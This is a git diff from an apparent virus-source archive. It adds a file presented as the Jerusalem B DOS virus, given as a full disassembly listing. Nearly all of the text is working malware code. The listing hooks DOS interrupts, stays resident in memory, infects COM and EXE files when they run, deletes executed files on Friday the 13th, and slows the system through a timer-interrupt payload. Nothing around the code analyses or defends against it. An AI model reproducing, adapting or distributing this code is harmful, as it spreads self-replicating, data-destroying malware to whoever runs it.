7A2E JPE X06C8 +0000:069A 6578 JNZ X0714 +0000:069C 6520 JNZ X06BE +0000:069E 613A JNO X06DA +0000:06A0 6B6F JPO X0711 +0000:06A2 6465 JZ X0709 +0000:06A4 6572 JNZ X0718 +0000:06A6 2E6578 JNZ X0721 +0000:06A9 650D JNZ X06B8 +0000:06AB 0000 ADD [BX+SI],AL +0000:06AD 0000 ADD [BX+SI],AL +0000:06AF 0000 ADD [BX+SI],AL +0000:06B1 0000 ADD [BX+SI],AL +0000:06B3 0000 ADD [BX+SI],AL +0000:06B5 0000 ADD [BX+SI],AL +0000:06B7 0000 ADD [BX+SI],AL +0000:06B9 0000 ADD [BX+SI],AL +0000:06BB 0000 ADD [BX+SI],AL +0000:06BD 0000 ADD [BX+SI],AL +0000:06BF 0000 ADD [BX+SI],AL +0000:06C1 0000 ADD [BX+SI],AL +0000:06C3 0000 ADD [BX+SI],AL +0000:06C5 0000 ADD [BX+SI],AL +0000:06C7 0000 ADD [BX+SI],AL +0000:06C9 0000 ADD [BX+SI],AL +0000:06CB 0000 ADD [BX+SI],AL +0000:06CD 0000 ADD [BX+SI],AL +0000:06CF 0000 ADD [BX+SI],AL +0000:06D1 0000 ADD [BX+SI],AL +0000:06D3 0000 ADD [BX+SI],AL +0000:06D5 0000 ADD [BX+SI],AL +0000:06D7 0000 ADD [BX+SI],AL +0000:06D9 005718 ADD [BX+018H],DL +0000:06DC 0825 OR [DI],AH +0000:06DE A5 MOVSW +0000:06DF FEC5 INC CH +0000:06E1 07 POP ES +0000:06E2 1E PUSH DS +0000:06E3 0210 ADD DL,[BX+SI] +0000:06E5 07 POP ES +0000:06E6 57 PUSH DI +0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH +0000:06EB 0104 ADD [SI],AX +0000:06ED 7F70 JG X075F + +"JV.MOC" PAGE 0014 + +0000:06EF 0010 ADD [BX+SI],DL +0000:06F1 07 POP ES +0000:06F2 1D001C SBB AX,01C00H +0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP +0000:06F9 0C1B OR AL,01BH +0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH] +0000:06FF F24D REPNE DEC BP +0000:0701 360E PUSH CS +0000:0703 0300 ADD AX,[BX+SI] +0000:0705 0000 ADD [BX+SI],AL +0000:0707 00EE ADD DH,CH +0000:0709 002A X0709: ADD [BP+SI],CH +0000:070B 0F POP CS +0000:070C 42 INC DX +0000:070D 01C1 ADD CX,AX +0000:070F 0DB44C OR AX,04CB4H +0000:0712 B000 MOV AL,00H +0000:0714 CD21 X0714: INT 021H +0000:0716 4D DEC BP +0000:0717 7344 JAE X075D +0000:0719 6F73 JG X078E + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru-s.asm b/MSDOS/Virus.MSDOS.Unknown.jeru-s.asm new file mode 100644 index 00000000..556a184d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jeru-s.asm @@ -0,0 +1,794 @@ +This is the Jerusalem B Virus. +"JV.MOC" PAGE 0001 + +0000:0000 E99200 JMP X0095 +0000:0003 7355 JAE X005A +0000:0005 4D DEC BP +0000:0006 7344 JAE X004C +0000:0008 6F73 JG X007D +0000:000A 0001 ADD [BX+DI],AL +0000:000C BD1700 MOV BP,0017H +0000:000F 0000 ADD [BX+SI],AL +0000:0011 06 PUSH ES +0000:0012 00A5FE00 ADD [DI+Y00FEH],AH +0000:0016 F016 LOCK PUSH SS +0000:0018 17 POP SS +0000:0019 7702 JA X001D +0000:001B BF053D MOV DI,03D05H +0000:001E 0CFB OR AL,0FBH +0000:0020 7D00 JGE X0022 +0000:0022 0000 X0022: ADD [BX+SI],AL +0000:0024 0000 ADD [BX+SI],AL +0000:0026 0000 ADD [BX+SI],AL +0000:0028 0000 ADD [BX+SI],AL +0000:002A 0000 ADD [BX+SI],AL +0000:002C 0000 ADD [BX+SI],AL +0000:002E E8062A CALL X2A37 +0000:0031 B10D MOV CL,0DH +0000:0033 800000 ADD BYTE PTR [BX+SI],00H +0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL +0000:003A 0D5C00 OR AX,005CH +0000:003D B10D MOV CL,0DH +0000:003F 6C00 JL X0041 +0000:0041 B10D X0041: MOV CL,0DH +0000:0043 0004 ADD [SI],AL +0000:0045 5F POP DI +0000:0046 0F POP CS +0000:0047 B400 MOV AH,00H +0000:0049 C1 RET ; INTRASEGMENT +0000:004A 0D00F0 X004A: OR AX,0F000H +0000:004D 06 PUSH ES +0000:004E 004D5A ADD [DI+05AH],CL +0000:0051 2000 AND [BX+SI],AL +0000:0053 1000 ADC [BX+SI],AL +0000:0055 1900 SBB [BX+SI],AX +0000:0057 0800 OR [BX+SI],AL +0000:0059 7500 JNZ X005B +0000:005B 7500 X005B: JNZ X005D +0000:005D 6901 X005D: JNS X0060 +0000:005F 1007 ADC [BX],AL +0000:0061 8419 TEST BL,[BX+DI] +0000:0063 C500 LDS AX,[BX+SI] +0000:0065 6901 JNS X0068 +0000:0067 1C00 SBB AL,00H +0000:0069 0000 ADD [BX+SI],AL +0000:006B 4C X006B: DEC SP +0000:006C B000 MOV AL,00H +0000:006E CD21 INT 021H +0000:0070 050020 ADD AX,02000H +0000:0073 0037 ADD [BX],DH + +"JV.MOC" PAGE 0002 + +0000:0075 121C ADC BL,[SI] +0000:0077 0100 ADD [BX+SI],AX +0000:0079 0210 ADD DL,[BX+SI] +0000:007B 0010 ADD [BX+SI],DL +0000:007D 17 X007D: POP SS +0000:007E 0000 ADD [BX+SI],AL +0000:0080 53 PUSH BX +0000:0081 61E8 JNO X006B +0000:0083 38434F CMP [BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H +0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H +0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR [Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH +0000:0616 F0FE1D LOCK CALL [DI] ; NOT VALID +0000:0619 F02F LOCK DAS +0000:061B 018E1E3C ADD [BP+Y03C1EH],CX +0000:061F 018E1EEB ADD [BP+Y0EB1EH],CX +0000:0623 048E ADD AL,08EH +0000:0625 1E PUSH DS +0000:0626 8E1EFFFF MOV DS,[Y0FFFFH] +0000:062A FFFF ??? DI +0000:062C FFFF ??? DI +0000:062E FFFF ??? DI +0000:0630 FFFF ??? DI +0000:0632 FFFF ??? DI +0000:0634 